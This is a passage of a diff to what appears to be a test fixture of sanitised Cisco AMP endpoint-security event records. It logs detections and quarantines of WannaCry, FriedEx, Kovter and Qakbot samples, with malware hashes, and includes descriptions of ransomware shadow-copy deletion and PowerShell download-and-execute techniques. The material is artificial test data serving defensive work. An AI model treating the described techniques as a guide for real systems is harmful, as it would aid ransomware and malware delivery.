Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}}
\ No newline at end of file
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 